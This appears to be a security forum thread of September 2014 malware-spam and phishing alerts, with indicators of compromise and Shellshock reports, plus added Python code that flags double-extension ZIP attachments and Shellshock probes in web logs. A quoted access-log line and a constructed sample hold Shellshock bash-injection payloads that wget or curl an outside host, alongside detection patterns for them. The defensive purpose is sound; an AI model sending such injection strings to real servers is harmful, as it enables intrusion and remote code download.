The links in the emails go to different download locations to make it harder to block... In each case the page then prompts the victim to download the file Invoice_09252014.zip from the same directory as the html file. This ZIP file contains a malicious executable Invoice_09252014.scr which currently has a VirusTotal detection rate of 3/54*. The Anubis report shows that it phones home to ukrchina-logistics .com which is probably worth blocking or monitoring access to."
* https://www.virustot...sis/1411638249/
... Behavioural information
DNS requests
ukrchina-logistics .com
TCP connections
188.165.198.52: https://www.virustot...52/information/
91.196.0.119

- http://threattrack.t...re-invoice-spam
Sep 25, 2014
Screenshot: https://gs1.wac.edge...x1ql1r6pupn.png
Tagged: Sage, Upatre
___

Fake BCA SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
25 Sep 2014 - "'BCA Banking 24.09.14' pretending to come from hallsaccounts <hallsaccounts@ hallsgb .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     Accounts Dept
    Halls Holdings Ltd
    Tel: 01743 450700
    Fax: 01743 443759 ...


25 September 2014: BCA Banking 24.09.14.pdf.zip : Extracts to: BCA Banking 24.09.14.pdf.exe
Current Virus total detections: 4/53* . This BCA Banking 24.09.14 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an image of a barcode to try to fool you instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411646762/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake voice mail SPAM – wav malware
- http://myonlinesecur...ke-wav-malware/
25 Sep 2014 - "'You have received a voice mail' pretending to come from Microsoft Outlook [no-reply@ Your domain] is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     You received a voice mail : VOICE7838396453.wav (26 KB)
    Caller-Id: 7838396453
    Message-Id: ID9CME
    Email-Id: [redacted]
    This e-mail contains a voice message.
    Download and extract the attachment to listen the message.
    Sent by Microsoft Exchange Server


25 September 2014 VOICE7838396453.zip (56kb): Extracts to: voicemessage.scr
Current Virus total detections: 1/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav (sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411657167/
... Behavioural information
TCP connections
23.21.52.195: https://www.virustot...95/information/
95.100.255.137: https://www.virustot...37/information/
194.150.168.70: https://www.virustot...70/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake Gov't e-mail SCAM
- https://www.ic3.gov/...014/140924.aspx
Sep 24, 2014 - "Cybercriminals posing as Internet Crime Complaint Center (IC3) employees are defrauding the public. The IC3 has received complaints from victims who were receiving e-mails purported to be from the IC3...  Victims report that the unsolicited e-mail sender is a representative of the IC3. The e-mails state that a criminal report was filed on the victim’s name and social security number and legal papers are pending. Scammers impersonate an IC3 employee to increase credibility and use threats of legal action to create a sense of urgency. Victims are informed they have one to two days from the date of the complaint to contact the scammers. Failure to respond to the e-mail will result in an arrest warrant issued to the victim. Some victims stated they were provided further details regarding the ‘criminal charges’ to include violations of federal banking regulations, collateral check fraud, and theft deception. Other victims claimed that their address was correct but their social security number was incorrect. Victims that requested additional information from the scammer were instructed to obtain prepaid money cards to avoid legal action. Victims have reported this -scam- in multiple states...  If you receive this type of e-mail:
- Resist the pressure to act quickly.
- -Never- wire money based on a telephone request or in an e-mail, especially to an overseas location.
The IC3 -never- charges the public for filing a complaint and will -never- threaten to have them arrested if they do not respond to an e-mail..."


Edited by AplusWebMaster, 25 September 2014 - 03:28 PM.

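The BCA and voicemail items above both rely on the "spoofed icon" trick: an .exe or .scr whose name carries a decoy document extension, which Explorer hides unless "show known file extensions" is enabled. The following is an added example (not code from the quoted blogs) of a mail-gateway style check that lists a ZIP attachment's members and flags that pattern; the archives it scans are constructed in memory with placeholder bytes, and the extension sets are this example's own assumptions.

```python
"""Flag ZIP attachments whose members use the double-extension / spoofed-icon trick."""
import io
import posixpath
import zipfile

# Extensions Windows will execute directly (assumed subset for this example).
EXECUTABLE_EXTS = {"exe", "scr", "pif", "com", "bat", "cmd", "js", "jse",
                   "vbs", "vbe", "wsf", "hta", "cpl"}
# Extensions a recipient would expect to be harmless documents or media.
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "wav", "mp3", "jpg",
              "png", "txt", "htm", "html"}


def displayed_name(name):
    """What Explorer shows with 'hide extensions for known file types' on:
    the final known extension is dropped, so 'x.pdf.exe' appears as 'x.pdf'."""
    base = posixpath.basename(name.replace("\\", "/"))
    stem, dot, ext = base.rpartition(".")
    if dot and ext.lower() in EXECUTABLE_EXTS | DECOY_EXTS:
        return stem
    return base


def classify_name(name):
    """Return the reasons a member name looks deceptive (empty list if none)."""
    base = posixpath.basename(name.replace("\\", "/"))
    parts = base.lower().split(".")
    reasons = []
    if len(parts) < 2:
        return reasons
    ext = parts[-1]
    if ext in EXECUTABLE_EXTS:
        reasons.append(f"executable extension .{ext}")
        decoys = [p for p in parts[1:-1] if p in DECOY_EXTS]
        if decoys:
            reasons.append(f"decoy extension .{decoys[-1]} hidden before .{ext}")
    return reasons


def scan_archive(zip_bytes):
    """Map each suspicious member of an in-memory ZIP to its reasons."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reasons = classify_name(info.filename)
            if reasons:
                findings[info.filename] = reasons
    return findings


def scan_attachment(attachment_name, zip_bytes):
    """Verdict for a mail attachment: checks the ZIP's members and also whether
    a name like 'X.pdf.zip' promises a document type that is not inside."""
    findings = scan_archive(zip_bytes)
    parts = attachment_name.lower().split(".")
    if len(parts) >= 3 and parts[-1] == "zip" and parts[-2] in DECOY_EXTS:
        with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
            members = [i.filename.lower() for i in zf.infolist()]
        if not any(m.endswith("." + parts[-2]) for m in members):
            findings[attachment_name] = [
                f"archive name promises .{parts[-2]} but contains none"]
    return {"verdict": "block" if findings else "allow", "findings": findings}


def build_sample_zip(member_names):
    """Construct a ZIP in memory with placeholder content (no real malware)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in member_names:
            zf.writestr(name, b"placeholder bytes, constructed for this example")
    return buf.getvalue()


if __name__ == "__main__":
    # Attachment names taken from the items above; contents are constructed.
    samples = [
        ("BCA Banking 24.09.14.pdf.zip", ["BCA Banking 24.09.14.pdf.exe"]),
        ("VOICE7838396453.zip", ["voicemessage.scr"]),
        ("Q3_report.pdf.zip", ["Q3_report.pdf"]),  # benign control
    ]
    for att_name, members in samples:
        result = scan_attachment(att_name, build_sample_zip(members))
        print(att_name, "->", result["verdict"])
        for member, reasons in result["findings"].items():
            print("   ", member, "(shown as:", displayed_name(member) + ")")
            for r in reasons:
                print("       -", r)
```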


#1288 AplusWebMaster


Posted 26 September 2014 - 06:51 AM

FYI...

Amazon phish ...
- http://myonlinesecur...ation-phishing/
26 Sep 2014 - "'Account Confirmation' pretending to come from Amazon .co.uk <auto-confirm@ amazon .co.uk> is a phishing email designed to get your Amazon log in details and then your bank, credit card, address and personal details so they can imitate you and take over your accounts and clean you out...

Screenshot: http://myonlinesecur...onfirmation.png

Following the link in this Amazon Account Confirmation or other spoofed emails takes you to a website that looks -exactly- like the real Amazon.co.uk site. You are then led through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your Amazon account, but also your Bank Account, Email details, webspace (if you have it). They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them ..."
___

Fake docs, voicemail, fax SPAM ...
- http://blog.dynamoo....-documents.html
26 Sep 2014 - "... different types of spam to increase click through rates and now some tricky tools to prevent analysis of the malware.

  Employee Documents - Internal Use
From:     victimdomain
Date:     26 September 2014 09:41
Subject:     Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Employee Documents ...
Documents are encrypted in transit and store in a secure repository...

 You have a new voice
From:     Voice Mail [Voice.Mail@ victimdomain]
Date:     26 September 2014 09:30
Subject:     You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs4004011004_001
The transmission length was 26
Receiving machine ID : ES7D-ZNA1D-QF3E
To download and listen your voice mail please follow the link ...

 RBS: BACS Transfer : Remittance for JSAG244GBP
From:     Douglas Byers [creditdepart@ rbs .co.uk]
Date:     26 September 2014 10:12
Subject:     BACS Transfer : Remittance for JSAG244GBP
We have arranged a BACS transfer to your bank for the following amount : 4596.00
Please find details at our secure link ...

 New Fax
From:     FAX Message [fax@victimdomain]
Date:     26 September 2014 10:26
Subject:     New Fax
You have received a new fax .
Date/Time: Fri, 26 Sep 2014 16:26:36 +0700.
Your Fax message can be downloaded here ...


... The attack has evolved recently.. usually these malicious links forwarded on to another site which had the malicious payload. Because all the links tended to end up at the same site, it was quite easy to block that site and foil the attack. But recently the payload is spread around many different sites making it harder to block. A new one today is that the landing page is somewhat obfuscated to make it harder to analyse, and this time the download is a plain old .scr file rather than a .zip. I've noticed that many anti-virus products are getting quite good at detecting the malicious ZIP files with a generic detection, but not the binary within. By removing the ZIP wrapper, the bad guys have given one less hook for AV engines to find.. malicious binary document7698124-86421_pdf.scr is downloaded from the remote site which has a VirusTotal detection rate of 2/55*. The Anubis report shows the malware attempting to phone home to padav .com which is probably worth blocking."
* https://www.virustot...sis/1411724904/
... Behavioural information
DNS requests
padav .com (184.106.55.51)
TCP connections
188.165.198.52: https://www.virustot...52/information/
184.106.55.51: https://www.virustot...51/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Bill.com Spam
- http://threattrack.t...8/bill-com-spam
Sep 26, 2014 - "Subjects Seen:
    Payment Details [Incident: 711935-599632]
Typical e-mail details:
    We could not process your Full Payment Submission. The submission for reference ***/UT5236489 was successfully received and was not processed. Check attached copy (PDF Document) for more information.
    Regards,
    Bill.com Payment Operations


Screenshot: https://gs1.wac.edge...YHaW1r6pupn.png

Malicious File Name and MD5:
    bill_com_Payment_Details_711935-599632.zip (02EE805D1EACD739BEF4697B26AAC847)
    bill_com_payment_details_ID0000012773616632715381235.pdf.exe (AD24CD2E14DCBF199078BDBBAE4BF0CA)


Tagged: bill.com, Vawtrak
___

More Fakes - HMRC, BT, RBS SPAM
- http://blog.dynamoo....pplication.html
26 Sep 2014 - "Another bunch of spam emails, with the same payload* as this earlier spam run*.

HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
From:     noreply@ taxreg .hmrc .gov.uk [noreply@ taxreg .hmrc .gov.uk]
Date:     26 September 2014 12:26
Subject:     HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
The application with reference number LZV9 0Q3E W5SD N3GV submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
Please download/view your HMRC documents here ...

 Important - BT Digital File
From:     Cory Sylvester [Cory.Sylvester@ bt .com]
Date:     26 September 2014 12:51
Subject:     Important - BT Digital File
Dear Customer,
This email contains your BT Digital File. Please scan attached file and reply to this email.
To download your BT Digital File please follow the link ...


  RBS Bankline: Outstanding invoice
    From:     Bankline.Administrator@ rbs .co.uk [Bankline.Administrator@ rbs .co.uk]
    To:     <REDACTED>
    Date:     26 September 2014 13:05
    Subject:     Outstanding invoice
       {_BODY_TXT}
    Dear [redacted],
    Please find the attached copy invoice which is showing as unpaid on our ledger.
    To download your invoice please click here ...


In the sample I looked at the malware page downloaded an archive document26092014-008_pdf.zip which in turn contains document26092014-008_pdf.exe which is the same payload* as earlier..."
* http://blog.dynamoo....-documents.html
___

Fake Barclays SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
26 Sep 2014 - "'Barclays Transaction not complete' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Unable to complete your most recent Transaction.  Currently your transaction has a pending status.
    If the transaction was made by mistake please contact our customer service.
    For more details please download payment receipt ...


26 September 2014: PaymentReceipt262.zip:  Extracts to: PaymentReceipt262.exe
Current Virus total detections: 2/55* . This 'Barclays Transaction not complete' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411738617/
... Behavioural information
DNS requests
wcdnitaly .org (195.110.124.133)
TCP connections
188.165.198.52: https://www.virustot...52/information/
195.110.124.133: https://www.virustot...33/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/


Edited by AplusWebMaster, 26 September 2014 - 01:14 PM.



#1289 AplusWebMaster


Posted 28 September 2014 - 05:26 AM

FYI...

Shellshock and MangoHost (mangohost .net) / 83.166.234.0/24
- http://blog.dynamoo....-mangohost.html
28 Sep 2014 - "I came across this particular sewer while looking in my logs for Shellshock access attempts yesterday... probing my server and attempting to WGET back to their own network to enumerate vulnerable hosts.
    dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http ://ad.dipad .biz/test/http ://dynamoo .com/\""
ad.dipaz .biz is hosted on 83.166.234.186, so pretty close to the probing IP of 83.166.234.133 which made me suspicious of the whole range... MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova*. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau. Until the past few days, MangoHost was hosting the -ransomware- sites listed here** [pastebin]. Past customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode .com, whatever that may be (you can guarantee it is nothing good). Currently hosted domains include a collection of -fake- browser plugins, some -malvertising- sites, some porn, spam sites, hacker resources, -ransomware- domains and what might appear to be some fake Russian law firms... I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it."
(More detail at the dynamoo URL above.)
* https://en.wikipedia...ians_in_Moldova

** http://pastebin.com/2mC1pXaJ

83.166.234.186: https://www.virustot...86/information/

83.166.234.133: https://www.virustot...33/information/
___

Shellshock in the Wild
- http://www.fireeye.c...n-the-wild.html
Sep 27, 2014 - "... We have observed a significant amount of overtly malicious traffic leveraging BASH, including:
- Malware droppers
- Reverse shells and backdoors
- Data exfiltration
- DDoS
Some of this suspicious activity appears to be originating from Russia. We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it’s only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise... Exploitation Techniques: The Shellshock traffic we have been able to observe is still quite chaotic. It is largely characterized by high volume automated scans and PoC-like exploit scripts... payload is a very small ELF executable (md5: 959aebc9b44c2a5fdd23330d9be1101e) that was submitted to VirusTotal yesterday with 0 detections. It simply creates a reverse shell, connecting to the same IP the payload was downloaded from: 82.118.242.223... We will continue monitoring the threats and keep you updated..."
(More detail at the fireeye URL above.)

- http://www.symantec....g-vulnerability
Updated: 29 Sep 2014 - "... Businesses, in particular website owners, are most at risk from this bug and should be aware that its exploitation may allow access to their data and provide attackers with a foothold on their network. Accordingly, it is of critical importance to apply any available patches immediately. Linux vendors have issued security advisories for the newly discovered vulnerability including patching information.
Debian: https://www.debian.o...y/2014/dsa-3032
Ubuntu: http://www.ubuntu.com/usn/usn-2362-1/
Red Hat: https://access.redha...rticles/1200223
CentOS: http://centosnow.blo...r-centos-5.html
Novell SUSE: http://support.novel...-2014-6271.html
*Red Hat has updated its advisory to include fixes for a number of remaining issues.

- https://rhn.redhat.c...-2014-1306.html
Last updated on: 2014-09-30

If a patch is unavailable for a specific distribution of Linux or Unix, it is recommended that users switch to an alternative shell until one becomes available.
For consumers: Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available.
Symantec Protection: Symantec has created an Intrusion Prevention signature for protection against this vulnerability:
27907 - OS Attack: GNU Bash CVE-2014-6271
> http://www.symantec.....jsp?asid=27907
Symantec will continue to investigate this vulnerability and provide more details as they become available."


Edited by AplusWebMaster, Today, 04:27 PM.

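The access-log line quoted in the MangoHost item above is the typical shape of a Shellshock probe: the `() { :;};` function-definition prefix placed in a header the web server passes into the environment, followed by a wget/curl callback to the scanner's own host. As an added example (not from the quoted blogs), this scans Apache combined-format log lines for that prefix and pulls out the callback URLs so they can be blocked or watched; the first sample line is the one from the page with its defanged URL spaces removed, and the other two lines, with RFC 5737 documentation addresses, are constructed.

```python
"""Detect Shellshock (CVE-2014-6271) probes in Apache combined-format access logs."""
import re

# Optional "vhost:port " prefix as in the quoted line, then the combined format.
# Quoted fields may contain backslash-escaped quotes, as the probe's payload does.
LOG_RE = re.compile(
    r'^(?:(?P<vhost>[\w.\-]+:\d+)\s+)?'
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<user_agent>(?:[^"\\]|\\.)*)"'
)

# The vulnerable bash parses any env var starting with "() {" as a function.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')
URL_RE = re.compile(r'https?://[^\s"\'\\]+')

# Header-derived fields a CGI server exports into the environment (HTTP_USER_AGENT,
# HTTP_REFERER, REQUEST_URI and friends), checked in this order.
CHECKED_FIELDS = ("request", "referer", "user_agent")

# Constructed sample log: line 1 is the probe quoted on the page, lines 2 and 3 are
# made up for this example (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).
SAMPLE_LOG = [
    r'dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http://ad.dipad.biz/test/http://dynamoo.com/\""',
    r'198.51.100.7 - - [27/Sep/2014:04:11:02 +0100] "GET /cgi-bin/status.sh HTTP/1.1" 404 512 "() { :; }; /usr/bin/curl -o /tmp/x http://203.0.113.9/bot" "Mozilla/5.0"',
    r'203.0.113.44 - - [27/Sep/2014:05:00:00 +0100] "GET /index.html HTTP/1.1" 200 11044 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def shellshock_field(rec):
    """Name of the first field carrying a Shellshock prefix, or None."""
    for field in CHECKED_FIELDS:
        if SHELLSHOCK_RE.search(rec[field]):
            return field
    return None


def extract_callbacks(text):
    """URLs embedded in a payload: the hosts the probe phones back to."""
    return URL_RE.findall(text)


def scan_log(lines):
    """Return one finding per probing line: source IP, field, payload, callbacks."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        field = shellshock_field(rec)
        if field is None:
            continue
        findings.append({
            "ip": rec["ip"],
            "timestamp": rec["ts"],
            "field": field,
            "payload": rec[field],
            "callbacks": extract_callbacks(rec[field]),
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['timestamp']} probe from {f['ip']} via {f['field']}")
        for url in f["callbacks"]:
            print("    callback:", url)
```

Only lines that parse as combined format are examined, so a sensor that also gets error-log or other formats should add a parser for those rather than treat a non-match as clean.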


#1290 cnm

    Mother Lion of SWI

  • Administrators
  • 25,257 posts

Posted 28 September 2014 - 12:46 PM

SWI is not vulnerable to Shellshock according to this test.. https://access.redha...rticles/1200223


Microsoft MVP Windows Security 2005-2006
How camest thou in this pickle? -- William Shakespeare:(1564-1616)
The various helper groups here
UNITE


#1291 AplusWebMaster


Posted Yesterday, 10:29 AM

FYI...

Fake SITA SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
29 Sep 2014 - "'Remittance Advice !!!' pretending to come from SITA UK < info @sita .co.uk > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Please find attached folder for remittance advice and your outstanding statement from SITA UK.
    Please arrange to send over a credit note as indicated in the statement.
    Best Regards,
    Luis Shivani,
    Financial Controller
    SITA UK ...


Update: a slightly revised email coming out now but still the -same- malware attachment
    Please find attached folder for remittance advice and your outstanding statement from SITA UK.
    Please arrange to send over a credit note as indicated in statement.
    Any queries please contact us on 01934-524004.
    Best Regards,
    Luis Shivani,
    Financial Controller
    SITA UK ...


29 September 2014: Remittance-Advice.zip: Extracts to: Remittance-Advice.exe
Current Virus total detections: 39/55* . This 'Remittance Advice !!!' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411951945/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake Invoice SPAM - XLS malware
- http://myonlinesecur...ke-xls-malware/
29 Sep 2014 - "'Your Invoice from Complete Office Solutions' pretending to come from donotreply@ c-o-s .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
  Hi Please find attached your recent invoices/credits from Complete Office Solutions, if you have any queries please do not hesitate in contacting us on 01904 693696 or email on Julie.edkins@ wallisbusinessservices .co.uk


29 September 2014: A Sales Invoice – By Account_SINV0612471.PDF.zip : Extracts to: A Sales Invoice – By Account_SINV0612471.xls.exe
Current Virus total detections: 25/54* . This 'Your Invoice from Complete Office Solutions' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper excel XLS file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411980639/
... Behavioural information
TCP connections
82.165.38.206: https://www.virustot...06/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake Bank SPAM - leads to malware
- http://blog.dynamoo....rcial-bank.html
29 Sep 2014 - "Two -different- banking spams this morning, leading to the same malware:
    Lloyds Commercial Bank "Important - Commercial Documents"
    From:     Lloyds Commercial Bank [secure@ lloydsbank .com]
    Date:     29 September 2014 11:03
    Subject:     Important - Commercial Documents
    Important account documents
    Reference: C947
    Case number: 18868193
    Please review BACs documents.
    Click link below, download and open document. (PDF Adobe file) ...

 HSBC Bank UK "Payment Advice Issued"
From:     HSBC Bank UK
Date:     29 September 2014 11:42
Subject:     Payment Advice Issued
Your payment advice is issued at the request of our customer. The advice is for your reference only.
Please download your payment advice at ...


The link in the email goes through a script and then downloads a file document_8641_29092014_pdf.scr (this time without a ZIP wrapper) which has a VirusTotal detection rate of just 1/55*. The Anubis report shows that the malware attempts to phone home to cuscorock .com which is probably a good thing to -block- or monitor."
* https://www.virustot...1e28b/analysis/
... Behavioural information
DNS requests
cuscorock .com (184.154.253.181)
formatech .es (81.88.48.71)
TCP connections
184.154.253.181: https://www.virustot...81/information/
81.88.48.71: https://www.virustot...71/information/
188.165.198.52: https://www.virustot...52/information/
___

Fake Order SPAM
- http://myonlinesecur...161864-malware/
29 Sep 2014 - "'Order statsus: Order confirmation: 9618161864' coming from random names at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Lots of different subjects for this email . All subjects have a random number involved and some have bad spelling mistakes, including:
- Order statsus: Order confirmation: 9618161864
- Order info: 32257958734
- Payment status: 93612666937
- Payment info: 21714421631
- Payment confirmation: 27863161481
The email looks like ( slightly different versions all with different names and phone numbers and companies):
Greetings,
 Your order #9618161864 will be shipped on 01.10.2014.
Date: September 29, 2014. 12:12pm
Price: £156.77
Transaction number: 9AECB76F37D22F21
 Please find the detailed information on your purchase in the attached file order_2014_09_29_9618161864.zip
 Kind regards,
Sales Department
Tiana Haggin ...


Date: order_2014_09_29_9618161864.zip: Extracts to: sale_2014_09_29_73981861092.exe

Current Virus total detections: 3/55* . This 'Order statsus: Order confirmation: 9618161864' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a red £ sign icon, that makes you think it is a proprietary invoice  instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411991708/
... Behavioural information
TCP connections
213.186.33.19: https://www.virustot...19/information/
23.62.99.24: https://www.virustot...24/information/
213.186.33.4: https://www.virustot....4/information/
___

More Fake Voicemail SPAM - fake wav malware
- http://myonlinesecur...ke-wav-malware/
29 Sep 2014 - "'New Voicemail Message SUY-301' coming from random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
  The Voice Mail message has been uploaded to the following web
    address ...
    You can play this Voice Mail on most computers.
    Please do not reply to this message. This is an automated message which
    comes from an unattended mailbox.
    This information contained within this e-mail is confidential to, and is
    for the exclusive use of the addressee(s).
    If you are not the addressee, then any distribution, copying or use of this
    e-mail is prohibited.
    If received in error, please advise the sender and delete/destroy it
    immediately.
    We accept no liability for any loss or damage suffered by any person
    arising from use of this e-mail.


... the link in the email is broken because the idiots who crafted the email messed up the formatting. There are literally hundreds of these emails and almost all of them have a different link address and a different set of letters and numbers...
29 September 2014: voice448705888444.zip: Extracts to: voice448705888444.scr
Current Virus total detections: 1/55* . This 'New Voicemail Message SUY-301' is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper wav (sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1412003182/
___

'Mailbox Has Exceeded The Storage Limit' - Phish ...
- https://blog.malware...ge-limit-phish/
Sep 29, 2014 - "Be wary of emails claiming you’ve gone over your email storage limit – users of both AOL and Outlook are reporting the following poorly written message crashing their mailbox party in the last couple of days:
    “Kindly Re-Validate Your Mailbox
    Your mailbox has exceeded the storage limit is 1 GB, which is defined by the administrator, are running at 99.8 gigabytes, you can not send or receive new messages until you re-validate your mailbox.
    To renew the mailbox,
    click link below: [removed]
    Thank you!
    Web mail system administrator!
    WARNING! Protect your privacy. Logout when you are done and completely
    exit your browser.”


The URL given on the Facebook post is already -dead- but it’s likely the people behind this have mails targeting other types of account and deploying multiple phish page links. In both examples, the scammers are using free AOL mail addresses – despite claiming to be from 'The Outlook Team' – which should raise a few red flags. AOL have confirmed the mail is a -hoax- and recipients should safely deposit it in their Trash folder..."
___

Bash Bug vulnerability
- http://www.symantec....g-vulnerability
Updated: 29 Sep 2014 - "... There are limited reports of the vulnerability being used by attackers in-the-wild. Proof-of-concept scripts have already been developed by security researchers. In addition to this, a module has been created for the Metasploit Framework, which is used for penetration testing...
How a malicious command can be tacked-on to the end of a legitimate environment variable. Bash will run the malicious command first
> http://www.symantec....am-600px_v2.png
... Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available..."

Table of C&C Servers:
- http://blog.trendmic...09/Table-01.jpg

89.238.150.154: https://www.virustot...54/information/
108.162.197.26: https://www.virustot...26/information/
162.253.66.76: https://www.virustot...76/information/
213.5.67.223: https://www.virustot...23/information/



Edited by AplusWebMaster, Yesterday, 02:14 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1292 AplusWebMaster

Posted Today, 05:41 AM

FYI...

Fake NatWest, new FAX SPAM
- http://blog.dynamoo....u-have-new.html
30 Sep 2014 - "The daily mixed spam run has just started again, these two samples seen so far this morning:

    NatWest: "You have a new Secure Message"
    From:     NatWest [secure.message@ natwest .com]
    Date:     30 September 2014 09:58
    Subject:     You have a new Secure Message - file-3800
    You have received a encrypted message from NatWest Customer Support
    In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
    Please download your ecnrypted message at ...

 "You've received a new fax"
From:     Fax [fax@victimdomain .com]
Date:     30 September 2014 09:57
Subject:     You've received a new fax
New fax at SCAN4148711 from EPSON by https ://victimdomain .com
Scan date: Tue, 30 Sep 2014 14:27:24 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at ...


The link in the email goes through a script to ensure that you are using a Windows PC and then downloads a file document3009.zip which contains a malicious executable document3009.scr which has a VirusTotal detection rate of 3/54*. The Comodo CAMAS report and Anubis report are rather inconclusive."
* https://www.virustot...sis/1412070442/
... Behavioural information
DNS requests
maazmedia .com (69.89.22.130)
TCP connections
188.165.198.52: https://www.virustot...52/information/
69.89.22.130: https://www.virustot...30/information/
___

Fake Delta Air SPAM - word doc malware
- http://myonlinesecur...rd-doc-malware/
30 Sep 2014 - "'Delta Air Thank you for your order' being sent to bookings@ uktservices .com and BCC copied to you pretending to come from Delta Air <login@ proche-hair .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     Order Notification,
    E-TICKET NUMBER / ET-98191471
    SEAT / 79F/ZONE 1
    DATE / TIME 2 OCTOBER, 2014, 11:15 PM
    ARRIVING / Berlin
    FORM OF PAYMENT / XXXXXX
    TOTAL PRICE / 214.61 GBP
    REF / OE.2368 ST / OK
    BAG / 3PC
    Your electronic ticket is attached to the letter as a scan document.
    You can print your ticket.
    Thank you for your attention.
    Delta Air Lines.


30 September 2014: ET-17843879.zip: Extracts to: DT-ET_5859799188.exe
